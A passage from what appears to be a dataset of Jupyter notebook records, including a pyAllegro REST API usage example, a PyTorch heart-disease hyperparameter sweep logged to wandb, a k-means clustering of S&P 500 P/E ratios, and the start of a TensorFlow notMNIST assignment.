"```\nRestApi.get_token()\n\nserver_address: ('localhost', 8000)\nWaiting for response with access_code from Allegro.pl (user authorization in progress)...\nGot an authorize code\n```\nDuring this process you will be redirected to allegro login page and you will be ask for access to your allegro account. \n<br/>\nToken that you'll receive is valid for 12 hours but don't worry, pyAllegro will refresh it automatically.\n\n\nIf you want to do it manually: \n```RestApi.load_token()``` - load token manually \n```RestApi.refresh_token()``` - refresh token manually \n\nAfter 12 months you will need to execute ```RestApi.get_token()``` process again.\n",
"_____no_output_____"
],
[
"## RestApi methods - how to use",
"_____no_output_____"
],
[
"Load PyAllegro and initiate AllegroRestApi instance. \nYour token will be loaded and refreshing automatically.",
"_____no_output_____"
]
],
[
[
"from pyAllegro.api import AllegroRestApi\nRestApi = AllegroRestApi()",
"_____no_output_____"
]
],
[
[
"You cann use all ```GET``` methods listed [here](https://developer.allegro.pl/documentation/) with ```RestApi.resource_get(resource_name='...',params={...})```",
"_____no_output_____"
],
[
"# Some examples",
"_____no_output_____"
],
[
"## User ratings summary",
"_____no_output_____"
]
],
[
[
"status_code, json_data = RestApi.resource_get(\n resource_name='/users/{userId}/ratings-summary'.format(\n **{'userId': 11791190}),\n params={}\n )",
"_____no_output_____"
]
],
[
[
"In response you will recive ```response.status_code``` and ```json``` with data",
"_____no_output_____"
]
],
[
[
"status_code",
"_____no_output_____"
],
[
"json_data",
"_____no_output_____"
]
],
[
[
"## offers listing - allegro search",
"_____no_output_____"
]
],
[
[
"status_code, json_data = RestApi.resource_get(\n resource_name='/offers/listing',\n params={'phrase': 'Dell Inspiron 7347 i5-4210U/8GB/256/Win8 FHD Dotyk',\n 'limit' : 1}\n )",
"_____no_output_____"
],
[
"json_data",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb04345daddee6b7164bfe94a9b3b175134baf7a | 25,796 | ipynb | Jupyter Notebook | wandb/run-20210520_094039-33b0f57p/tmp/code/_session_history.ipynb | Programmer-RD-AI/Heart-Disease-UCI | b077f8496fba3fe1a9a073c80d0a5df73c720f29 | [
"Apache-2.0"
] | null | null | null | wandb/run-20210520_094039-33b0f57p/tmp/code/_session_history.ipynb | Programmer-RD-AI/Heart-Disease-UCI | b077f8496fba3fe1a9a073c80d0a5df73c720f29 | [
"Apache-2.0"
] | null | null | null | wandb/run-20210520_094039-33b0f57p/tmp/code/_session_history.ipynb | Programmer-RD-AI/Heart-Disease-UCI | b077f8496fba3fe1a9a073c80d0a5df73c720f29 | [
"Apache-2.0"
] | null | null | null | 31.381995 | 270 | 0.535742 | [
[
[
"lossess = [nn.L1Loss,nn.MSELoss,torch.nn.HingeEmbeddingLoss,torch.nn.MarginRankingLoss,torch.nn.TripletMarginLossnn.BCELoss]\nfor criterion in lossess:\n model = Test_Model(num_of_layers=1,activation=nn.Tanh()).to(device)\n model.to(device)\n optimizer = torch.optim.SGD(model.parameters(),lr=0.25)\n criterion = criterion()\n wandb.init(project=PROJECT_NAME,name=f'criterion-{criterion}')\n for _ in tqdm(range(212)):\n preds = model(X_train.float().to(device),True)\n preds = preds.view(len(preds),)\n preds.to(device)\n loss = criterion(preds,y_train)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(preds,y_train)})\n wandb.finish()",
"_____no_output_____"
],
[
"import pandas as pd",
"_____no_output_____"
],
[
"data = pd.read_csv('./data.csv')",
"_____no_output_____"
],
[
"X,y = data.drop('target',axis=1),data['target']",
"_____no_output_____"
],
[
"from sklearn.model_selection import train_test_split",
"_____no_output_____"
],
[
"X_train,X_test,y_train,y_test = train_test_split(X,y,test_size=0.25)",
"_____no_output_____"
],
[
"import torch\nimport torch.nn as nn",
"_____no_output_____"
],
[
"import numpy as np",
"_____no_output_____"
],
[
"X_train = torch.from_numpy(np.array(X_train).astype(np.float32))\ny_train = torch.from_numpy(np.array(y_train).astype(np.float32))\nX_test = torch.from_numpy(np.array(X_test).astype(np.float32))\ny_test = torch.from_numpy(np.array(y_test).astype(np.float32))",
"_____no_output_____"
],
[
"X_train.shape",
"torch.Size([227, 13])"
],
[
"X_test.shape",
"torch.Size([76, 13])"
],
[
"y_train.shape",
"torch.Size([227])"
],
[
"y_test.shape",
"torch.Size([76])"
],
[
"import torch.nn.functional as F",
"_____no_output_____"
],
[
"class Test_Model(nn.Module):\n def __init__(self):\n super().__init__()\n self.fc1 = nn.Linear(13,64)\n self.fc2 = nn.Linear(64,128)\n self.fc3 = nn.Linear(128,256)\n self.fc4 = nn.Linear(256,512)\n self.fc5 = nn.Linear(512,1024)\n self.fc6 = nn.Linear(1024,512)\n self.fc7 = nn.Linear(512,1)\n \n def forward(self,X):\n preds = self.fc1(X)\n preds = F.relu(preds)\n preds = self.fc2(preds)\n preds = F.relu(preds)\n preds = self.fc3(preds)\n preds = F.relu(preds)\n preds = self.fc4(preds)\n preds = F.relu(preds)\n preds = self.fc5(preds)\n preds = F.relu(preds)\n preds = self.fc6(preds)\n preds = F.relu(preds)\n preds = self.fc7(preds)\n return F.sigmoid(preds)",
"_____no_output_____"
],
[
"device = torch.device('cuda')",
"_____no_output_____"
],
[
"X_train = X_train.to(device)\ny_train = y_train.to(device)\nX_test = X_test.to(device)\ny_test = y_test.to(device)",
"_____no_output_____"
],
[
"PROJECT_NAME = 'Heart-Disease-UCI'",
"_____no_output_____"
],
[
"def get_loss(criterion,X,y,model):\n model.eval()\n with torch.no_grad():\n preds = model(X.float().to(device))\n preds = preds.view(len(preds),).to(device)\n y = y.view(len(y),).to(device)\n loss = criterion(preds,y)\n model.train()\n return loss.item()\ndef get_accuracy(preds,y):\n correct = 0\n total = 0\n for real,pred in zip(y_train,preds):\n if real == pred:\n correct += 1\n total += 1\n return round(correct/total,3)",
"_____no_output_____"
],
[
"import wandb",
"_____no_output_____"
],
[
"from tqdm import tqdm",
"_____no_output_____"
],
[
"EPOCHS = 212\n# EPOCHS = 100",
"_____no_output_____"
],
[
"# model = Test_Model().to(device)\n# optimizer = torch.optim.SGD(model.parameters(),lr=0.25)\n# criterion = nn.L1Loss()\n# wandb.init(project=PROJECT_NAME,name='baseline')\n# for _ in tqdm(range(EPOCHS)):\n# preds = model(X_train.float().to(device))\n# preds = preds.view(len(preds),)\n# preds.to(device)\n# loss = criterion(preds,y_train)\n# optimizer.zero_grad()\n# loss.backward()\n# optimizer.step()\n# wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(X_train,y_train,model),'val_accuracy':get_accuracy(X_test,y_test,model)})\n# wandb.finish()",
"_____no_output_____"
],
[
"# preds[:10]",
"_____no_output_____"
],
[
"# preds = torch.round(preds)",
"_____no_output_____"
],
[
"# correct = 0\n# total = 0\n# for real,pred in zip(y_train,preds):\n# if real == pred:\n# correct += 1\n# # total += 1",
"_____no_output_____"
],
[
"# round(correct/total,3)",
"_____no_output_____"
],
[
"## Testing Modelling",
"_____no_output_____"
],
[
"import torch\nimport torch.nn as nn",
"_____no_output_____"
],
[
"class Test_Model(nn.Module):\n def __init__(self,num_of_layers=1,activation=F.relu,input_shape=13,fc1_output=32,fc2_output=64,fc3_output=128,fc4_output=256,output_shape=1):\n super().__init__()\n self.num_of_layers = num_of_layers\n self.activation = activation\n self.fc1 = nn.Linear(input_shape,fc1_output)\n self.fc2 = nn.Linear(fc1_output,fc2_output)\n self.fc3 = nn.Linear(fc2_output,fc3_output)\n self.fc4 = nn.Linear(fc3_output,fc4_output)\n self.fc5 = nn.Linear(fc4_output,fc3_output)\n self.fc6 = nn.Linear(fc3_output,fc3_output)\n self.fc7 = nn.Linear(fc3_output,output_shape)\n \n def forward(self,X,activation=False):\n preds = self.fc1(X)\n if activation:\n preds = self.activation(preds)\n preds = self.fc2(preds)\n if activation:\n preds = self.activation(preds)\n preds = self.fc3(preds)\n if activation:\n preds = self.activation(preds)\n preds = self.fc4(preds)\n if activation:\n preds = self.activation(preds)\n preds = self.fc5(preds)\n if activation:\n preds = self.activation(preds)\n for _ in range(self.num_of_layers):\n preds = self.fc6(preds)\n if activation:\n preds = self.activation(preds)\n preds = self.fc7(preds)\n preds = F.sigmoid(preds)\n return preds",
"_____no_output_____"
],
[
"device = torch.device('cuda')",
"_____no_output_____"
],
[
"# preds = torch.round(preds)",
"_____no_output_____"
],
[
"# num_of_layers = 1\n# input_shape\n# fc1_output\n# fc2_output\n# fc3_output\n# fc4_output\n# output_shape\n# optimizer = torch.optim.SGD\n# criterion = \n# lr\n# activtion = nn.Tanh()",
"_____no_output_____"
],
[
"lossess = [nn.L1Loss,nn.MSELoss,torch.nn.HingeEmbeddingLoss,torch.nn.MarginRankingLoss,torch.nn.TripletMarginLossnn.BCELoss]\nfor criterion in lossess:\n model = Test_Model(num_of_layers=1,activation=nn.Tanh()).to(device)\n model.to(device)\n optimizer = torch.optim.SGD(model.parameters(),lr=0.25)\n criterion = criterion()\n wandb.init(project=PROJECT_NAME,name=f'criterion-{criterion}')\n for _ in tqdm(range(212)):\n preds = model(X_train.float().to(device),True)\n preds = preds.view(len(preds),)\n preds.to(device)\n loss = criterion(preds,y_train)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(preds,y_train)})\n wandb.finish()",
"_____no_output_____"
],
[
"lossess = [nn.L1Loss,nn.MSELoss,torch.nn.HingeEmbeddingLoss,torch.nn.MarginRankingLoss,torch.nn.TripletMarginLossnn,torch.nn.BCELoss]\nfor criterion in lossess:\n model = Test_Model(num_of_layers=1,activation=nn.Tanh()).to(device)\n model.to(device)\n optimizer = torch.optim.SGD(model.parameters(),lr=0.25)\n criterion = criterion()\n wandb.init(project=PROJECT_NAME,name=f'criterion-{criterion}')\n for _ in tqdm(range(212)):\n preds = model(X_train.float().to(device),True)\n preds = preds.view(len(preds),)\n preds.to(device)\n loss = criterion(preds,y_train)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(preds,y_train)})\n wandb.finish()",
"_____no_output_____"
],
[
"lossess = [nn.L1Loss,nn.MSELoss,torch.nn.HingeEmbeddingLoss,torch.nn.MarginRankingLoss,torch.nn.TripletMarginLoss,torch.nn.BCELoss]\nfor criterion in lossess:\n model = Test_Model(num_of_layers=1,activation=nn.Tanh()).to(device)\n model.to(device)\n optimizer = torch.optim.SGD(model.parameters(),lr=0.25)\n criterion = criterion()\n wandb.init(project=PROJECT_NAME,name=f'criterion-{criterion}')\n for _ in tqdm(range(212)):\n preds = model(X_train.float().to(device),True)\n preds = preds.view(len(preds),)\n preds.to(device)\n loss = criterion(preds,y_train)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(preds,y_train)})\n wandb.finish()",
"_____no_output_____"
],
[
"# nn.L1Loss,nn.MSELoss,torch.nn.HingeEmbeddingLoss,\nlossess = [torch.nn.TripletMarginLoss,torch.nn.BCELoss]\nfor criterion in lossess:\n model = Test_Model(num_of_layers=1,activation=nn.Tanh()).to(device)\n model.to(device)\n optimizer = torch.optim.SGD(model.parameters(),lr=0.25)\n criterion = criterion()\n wandb.init(project=PROJECT_NAME,name=f'criterion-{criterion}')\n for _ in tqdm(range(212)):\n preds = model(X_train.float().to(device),True)\n preds = preds.view(len(preds),)\n preds.to(device)\n loss = criterion(preds,y_train)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(preds,y_train)})\n wandb.finish()",
"_____no_output_____"
],
[
"# nn.L1Loss,nn.MSELoss,torch.nn.HingeEmbeddingLoss,\nlossess = [torch.nn.BCELoss]\nfor criterion in lossess:\n model = Test_Model(num_of_layers=1,activation=nn.Tanh()).to(device)\n model.to(device)\n optimizer = torch.optim.SGD(model.parameters(),lr=0.25)\n criterion = criterion()\n wandb.init(project=PROJECT_NAME,name=f'criterion-{criterion}')\n for _ in tqdm(range(212)):\n preds = model(X_train.float().to(device),True)\n preds = preds.view(len(preds),)\n preds.to(device)\n loss = criterion(preds,y_train)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(preds,y_train)})\n wandb.finish()",
"_____no_output_____"
],
[
"lrs = [0.1,1.0,0.25,0.125,0.5,0.75,0.01,0.001,0.0001]\nfor lr in lrs:\n model = Test_Model(num_of_layers=1,activation=nn.Tanh()).to(device)\n model.to(device)\n optimizer = torch.optim.SGD(model.parameters(),lr=lr)\n criterion = nn.MSELoss()\n wandb.init(project=PROJECT_NAME,name=f'lr-{lr}')\n for _ in tqdm(range(212)):\n preds = model(X_train.float().to(device),True)\n preds = preds.view(len(preds),)\n preds.to(device)\n loss = criterion(preds,y_train)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(preds,y_train)})\n wandb.finish()",
"_____no_output_____"
],
[
"fc1_outputs = [16,32,64,128,256]\nfor fc1_output in fc1_outputs:\n model = Test_Model(num_of_layers=1,activation=nn.Tanh()fc1_outputs=fc1_output).to(device)\n model.to(device)\n optimizer = torch.optim.SGD(model.parameters(),lr=0.125)\n criterion = nn.MSELoss()\n wandb.init(project=PROJECT_NAME,name=f'fc1_output-{fc1_output}')\n for _ in tqdm(range(212)):\n preds = model(X_train.float().to(device),True)\n preds = preds.view(len(preds),)\n preds.to(device)\n loss = criterion(preds,y_train)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(preds,y_train)})\n wandb.finish()",
"_____no_output_____"
],
[
"fc1_outputs = [16,32,64,128,256]\nfor fc1_output in fc1_outputs:\n model = Test_Model(num_of_layers=1,activation=nn.Tanh(),fc1_outputs=fc1_output).to(device)\n model.to(device)\n optimizer = torch.optim.SGD(model.parameters(),lr=0.125)\n criterion = nn.MSELoss()\n wandb.init(project=PROJECT_NAME,name=f'fc1_output-{fc1_output}')\n for _ in tqdm(range(212)):\n preds = model(X_train.float().to(device),True)\n preds = preds.view(len(preds),)\n preds.to(device)\n loss = criterion(preds,y_train)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(preds,y_train)})\n wandb.finish()",
"_____no_output_____"
],
[
"fc1_outputs = [16,32,64,128,256]\nfor fc1_output in fc1_outputs:\n model = Test_Model(num_of_layers=1,activation=nn.Tanh(),fc1_output=fc1_output).to(device)\n model.to(device)\n optimizer = torch.optim.SGD(model.parameters(),lr=0.125)\n criterion = nn.MSELoss()\n wandb.init(project=PROJECT_NAME,name=f'fc1_output-{fc1_output}')\n for _ in tqdm(range(212)):\n preds = model(X_train.float().to(device),True)\n preds = preds.view(len(preds),)\n preds.to(device)\n loss = criterion(preds,y_train)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(preds,y_train)})\n wandb.finish()",
"_____no_output_____"
],
[
"fc2_outputs = [16,32,64,128,256,512]\nfor fc2_output in fc2_outputs:\n model = Test_Model(num_of_layers=1,activation=nn.Tanh(),fc1_output=256,fc2_output=fc2_output).to(device)\n model.to(device)\n optimizer = torch.optim.SGD(model.parameters(),lr=0.125)\n criterion = nn.MSELoss()\n wandb.init(project=PROJECT_NAME,name=f'fc2_output-{fc2_output}')\n for _ in tqdm(range(212)):\n preds = model(X_train.float().to(device),True)\n preds = preds.view(len(preds),)\n preds.to(device)\n loss = criterion(preds,y_train)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(preds,y_train)})\n wandb.finish()",
"_____no_output_____"
],
[
"fc3_outputs = [16,32,64,128,256,512,1024]\nfor fc3_output in fc3_outputs:\n model = Test_Model(num_of_layers=1,activation=nn.Tanh(),fc1_output=256,fc2_output=64,fc3_output=fc3_output).to(device)\n model.to(device)\n optimizer = torch.optim.SGD(model.parameters(),lr=0.125)\n criterion = nn.MSELoss()\n wandb.init(project=PROJECT_NAME,name=f'fc3_output-{fc3_output}')\n for _ in tqdm(range(212)):\n preds = model(X_train.float().to(device),True)\n preds = preds.view(len(preds),)\n preds.to(device)\n loss = criterion(preds,y_train)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(preds,y_train)})\n wandb.finish()",
"_____no_output_____"
],
[
"# num_of_layers = 1\n# fc1_output = 256\n# fc2_output = 64\n# fc3_output = 32\n# fc4_output = \n# optimizer = torch.optim.SGD\n# criterion = nn.MSELoss\n# lr = 0.125\n# activtion = nn.Tanh()",
"_____no_output_____"
],
[
"fc4_outputs = [16,32,64,128,256,512,1024,2048]\nfor fc4_output in fc4_outputs:\n model = Test_Model(num_of_layers=1,activation=nn.Tanh(),fc1_output=256,fc2_output=64,fc3_output=32,fc4_output=fc4_output).to(device)\n model.to(device)\n optimizer = torch.optim.SGD(model.parameters(),lr=0.125)\n criterion = nn.MSELoss()\n wandb.init(project=PROJECT_NAME,name=f'fc4_output-{fc4_output}')\n for _ in tqdm(range(212)):\n preds = model(X_train.float().to(device),True)\n preds = preds.view(len(preds),)\n preds.to(device)\n loss = criterion(preds,y_train)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(preds,y_train)})\n wandb.finish()",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb0441285c1642b48c8a8fb96abcd4446918cf73 | 85,844 | ipynb | Jupyter Notebook | static/python/.ipynb_checkpoints/kmeans_trial-checkpoint.ipynb | ALGEND/stockfinder.github.io | 63bad4419f505e587bfb153e24fd18b140717768 | [
"FSFAP"
] | 1 | 2019-05-14T17:41:14.000Z | 2019-05-14T17:41:14.000Z | static/python/kmeans_trial.ipynb | ALGEND/stockfinder.github.io | 63bad4419f505e587bfb153e24fd18b140717768 | [
"FSFAP"
] | null | null | null | static/python/kmeans_trial.ipynb | ALGEND/stockfinder.github.io | 63bad4419f505e587bfb153e24fd18b140717768 | [
"FSFAP"
] | null | null | null | 51.465228 | 13,940 | 0.477809 | [
[
[
"# Dependencies\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom sklearn.cluster import KMeans",
"_____no_output_____"
]
],
[
[
"# Analysis of Price/Rating and Price/Action; applying match function in Excel and data plotting with Sklearn library",
"_____no_output_____"
]
],
[
[
"# Load S%P 500 constituent data\n\nkmdata = pd.read_csv('/Users/algend/Desktop/Project_3_Code/StockFinder_Dashboard_Re/static/csv/Financials_2.csv')\nkmdata.head(505)",
"_____no_output_____"
]
],
[
[
"# Best(Rating) vs Buy(Action) and/or Better(Rating) vs Sell(Action) and/or Good(Rating) vs Hold(Action) are displaying a numerical value direct match or relative data pertained to the accounts P/R and P/A tested mathematical ratios. ",
"_____no_output_____"
]
],
[
[
"# Create Array of Samples \"X1\" for Price/Earnings/Rating(P/R) vs. Price/Earnings/Action(P/A)\nX1_df = kmdata.loc[:, kmdata.columns.intersection(['PE/R', 'PE/A'])]\nX1 = X1_df.values\n#X1",
"_____no_output_____"
],
[
"plt.scatter(X1[:, 0], X1[:,1])\nplt.show()",
"_____no_output_____"
]
],
[
[
"# K-Means clustering is a fast, robust, and simple algorithm that gives reliable results when data sets are distinct or well separated from each other in a linear fashion. \n## https://brilliant.org/wiki/k-means-clustering/",
"_____no_output_____"
]
],
[
[
"# Use n_clusters=5 as the k value\nkmeans = KMeans(n_clusters=4)\n\n# Fit the model to the data\nkmeans.fit(X1)",
"_____no_output_____"
],
[
"# Predict the clusters\npredicted_clusters = kmeans.predict(X1)",
"_____no_output_____"
],
[
"plt.scatter(X1[:, 0], X1[:, 1], c=predicted_clusters, s=50, cmap='viridis')\nplt.xlabel('P/E/Rating')\nplt.ylabel('P/E/Action')\n\nplt.show()",
"_____no_output_____"
]
],
[
[
"# Analysis Results:",
"_____no_output_____"
],
[
"# The plot is separated into 4 cluster groups from 505 samples:\n# Represents a patterned plotted linear correlation between random groups in Price/Earnings/Rating(PE/R) vs. Price/Earnings/Action(PE/A) ratios. Linear correlation assumption is due to price per earnings value present as a part of both the Rating and Action formulas. \n\n#This study assumed active\n\n",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
]
] |
cb0461a4810025b149eb3229587ca41d02a8ea90 | 18,701 | ipynb | Jupyter Notebook | tensorflow/udacity/2_fullyconnected.ipynb | saarthakbhola/DeepLearning_Work | a88f9c78e877d11442d4e647b63a76f8a6207cc7 | [
"MIT"
] | null | null | null | tensorflow/udacity/2_fullyconnected.ipynb | saarthakbhola/DeepLearning_Work | a88f9c78e877d11442d4e647b63a76f8a6207cc7 | [
"MIT"
] | null | null | null | tensorflow/udacity/2_fullyconnected.ipynb | saarthakbhola/DeepLearning_Work | a88f9c78e877d11442d4e647b63a76f8a6207cc7 | [
"MIT"
] | null | null | null | 31.912969 | 284 | 0.568098 | [
[
[
"Deep Learning\n=============\n\nAssignment 2\n------------\n\nPreviously in `1_notmnist.ipynb`, we created a pickle with formatted datasets for training, development and testing on the [notMNIST dataset](http://yaroslavvb.blogspot.com/2011/09/notmnist-dataset.html).\n\nThe goal of this assignment is to progressively train deeper and more accurate models using TensorFlow.",
"_____no_output_____"
]
],
[
[
"# These are all the modules we'll be using later. Make sure you can import them\n# before proceeding further.\nfrom __future__ import print_function\nimport numpy as np\nimport tensorflow as tf\nfrom six.moves import cPickle as pickle\nfrom six.moves import range",
"_____no_output_____"
]
],
[
[
"First reload the data we generated in `1_notmnist.ipynb`.",
"_____no_output_____"
]
],
[
[
"pickle_file = 'notMNIST.pickle'\n\nwith open(pickle_file, 'rb') as f:\n save = pickle.load(f)\n train_dataset = save['train_dataset']\n train_labels = save['train_labels']\n valid_dataset = save['valid_dataset']\n valid_labels = save['valid_labels']\n test_dataset = save['test_dataset']\n test_labels = save['test_labels']\n del save # hint to help gc free up memory\n print('Training set', train_dataset.shape, train_labels.shape)\n print('Validation set', valid_dataset.shape, valid_labels.shape)\n print('Test set', test_dataset.shape, test_labels.shape)",
"Training set (200000, 28, 28) (200000,)\nValidation set (10000, 28, 28) (10000,)\nTest set (18724, 28, 28) (18724,)\n"
]
],
[
[
"Reformat into a shape that's more adapted to the models we're going to train:\n- data as a flat matrix,\n- labels as float 1-hot encodings.",
"_____no_output_____"
]
],
[
[
"image_size = 28\nnum_labels = 10\n\ndef reformat(dataset, labels):\n dataset = dataset.reshape((-1, image_size * image_size)).astype(np.float32)\n # Map 0 to [1.0, 0.0, 0.0 ...], 1 to [0.0, 1.0, 0.0 ...]\n labels = (np.arange(num_labels) == labels[:,None]).astype(np.float32)\n return dataset, labels\ntrain_dataset, train_labels = reformat(train_dataset, train_labels)\nvalid_dataset, valid_labels = reformat(valid_dataset, valid_labels)\ntest_dataset, test_labels = reformat(test_dataset, test_labels)\nprint('Training set', train_dataset.shape, train_labels.shape)\nprint('Validation set', valid_dataset.shape, valid_labels.shape)\nprint('Test set', test_dataset.shape, test_labels.shape)",
"Training set (200000, 784) (200000, 10)\nValidation set (10000, 784) (10000, 10)\nTest set (18724, 784) (18724, 10)\n"
]
],
[
[
"We're first going to train a multinomial logistic regression using simple gradient descent.\n\nTensorFlow works like this:\n* First you describe the computation that you want to see performed: what the inputs, the variables, and the operations look like. These get created as nodes over a computation graph. This description is all contained within the block below:\n\n with graph.as_default():\n ...\n\n* Then you can run the operations on this graph as many times as you want by calling `session.run()`, providing it outputs to fetch from the graph that get returned. This runtime operation is all contained in the block below:\n\n with tf.Session(graph=graph) as session:\n ...\n\nLet's load all the data into TensorFlow and build the computation graph corresponding to our training:",
"_____no_output_____"
]
],
[
[
"# With gradient descent training, even this much data is prohibitive.\n# Subset the training data for faster turnaround.\ntrain_subset = 10000\n\ngraph = tf.Graph()\nwith graph.as_default():\n\n # Input data.\n # Load the training, validation and test data into constants that are\n # attached to the graph.\n tf_train_dataset = tf.constant(train_dataset[:train_subset, :])\n tf_train_labels = tf.constant(train_labels[:train_subset])\n tf_valid_dataset = tf.constant(valid_dataset)\n tf_test_dataset = tf.constant(test_dataset)\n \n # Variables.\n # These are the parameters that we are going to be training. The weight\n # matrix will be initialized using random values following a (truncated)\n # normal distribution. The biases get initialized to zero.\n weights = tf.Variable(\n tf.truncated_normal([image_size * image_size, num_labels]))\n biases = tf.Variable(tf.zeros([num_labels]))\n \n # Training computation.\n # We multiply the inputs with the weight matrix, and add biases. We compute\n # the softmax and cross-entropy (it's one operation in TensorFlow, because\n # it's very common, and it can be optimized). We take the average of this\n # cross-entropy across all training examples: that's our loss.\n logits = tf.matmul(tf_train_dataset, weights) + biases\n loss = tf.reduce_mean(\n tf.nn.softmax_cross_entropy_with_logits(labels=tf_train_labels, logits=logits))\n \n # Optimizer.\n # We are going to find the minimum of this loss using gradient descent.\n optimizer = tf.train.GradientDescentOptimizer(0.5).minimize(loss)\n \n # Predictions for the training, validation, and test data.\n # These are not part of training, but merely here so that we can report\n # accuracy figures as we train.\n train_prediction = tf.nn.softmax(logits)\n valid_prediction = tf.nn.softmax(\n tf.matmul(tf_valid_dataset, weights) + biases)\n test_prediction = tf.nn.softmax(tf.matmul(tf_test_dataset, weights) + biases)",
"_____no_output_____"
]
],
[
[
"Let's run this computation and iterate:",
"_____no_output_____"
]
],
[
[
"num_steps = 801\n\ndef accuracy(predictions, labels):\n return (100.0 * np.sum(np.argmax(predictions, 1) == np.argmax(labels, 1))\n / predictions.shape[0])\n\nwith tf.Session(graph=graph) as session:\n # This is a one-time operation which ensures the parameters get initialized as\n # we described in the graph: random weights for the matrix, zeros for the\n # biases. \n tf.global_variables_initializer().run()\n print('Initialized')\n for step in range(num_steps):\n # Run the computations. We tell .run() that we want to run the optimizer,\n # and get the loss value and the training predictions returned as numpy\n # arrays.\n _, l, predictions = session.run([optimizer, loss, train_prediction])\n if (step % 100 == 0):\n print('Loss at step %d: %f' % (step, l))\n print('Training accuracy: %.1f%%' % accuracy(\n predictions, train_labels[:train_subset, :]))\n # Calling .eval() on valid_prediction is basically like calling run(), but\n # just to get that one numpy array. Note that it recomputes all its graph\n # dependencies.\n print('Validation accuracy: %.1f%%' % accuracy(\n valid_prediction.eval(), valid_labels))\n print('Test accuracy: %.1f%%' % accuracy(test_prediction.eval(), test_labels))",
"Initialized\nLoss at step 0 : 17.2939\nTraining accuracy: 10.8%\nValidation accuracy: 13.8%\nLoss at step 100 : 2.26903\nTraining accuracy: 72.3%\nValidation accuracy: 71.6%\nLoss at step 200 : 1.84895\nTraining accuracy: 74.9%\nValidation accuracy: 73.9%\nLoss at step 300 : 1.60701\nTraining accuracy: 76.0%\nValidation accuracy: 74.5%\nLoss at step 400 : 1.43912\nTraining accuracy: 76.8%\nValidation accuracy: 74.8%\nLoss at step 500 : 1.31349\nTraining accuracy: 77.5%\nValidation accuracy: 75.0%\nLoss at step 600 : 1.21501\nTraining accuracy: 78.1%\nValidation accuracy: 75.4%\nLoss at step 700 : 1.13515\nTraining accuracy: 78.6%\nValidation accuracy: 75.4%\nLoss at step 800 : 1.0687\nTraining accuracy: 79.2%\nValidation accuracy: 75.6%\nTest accuracy: 82.9%\n"
]
],
[
[
"Let's now switch to stochastic gradient descent training instead, which is much faster.\n\nThe graph will be similar, except that instead of holding all the training data into a constant node, we create a `Placeholder` node which will be fed actual data at every call of `session.run()`.",
"_____no_output_____"
]
],
[
[
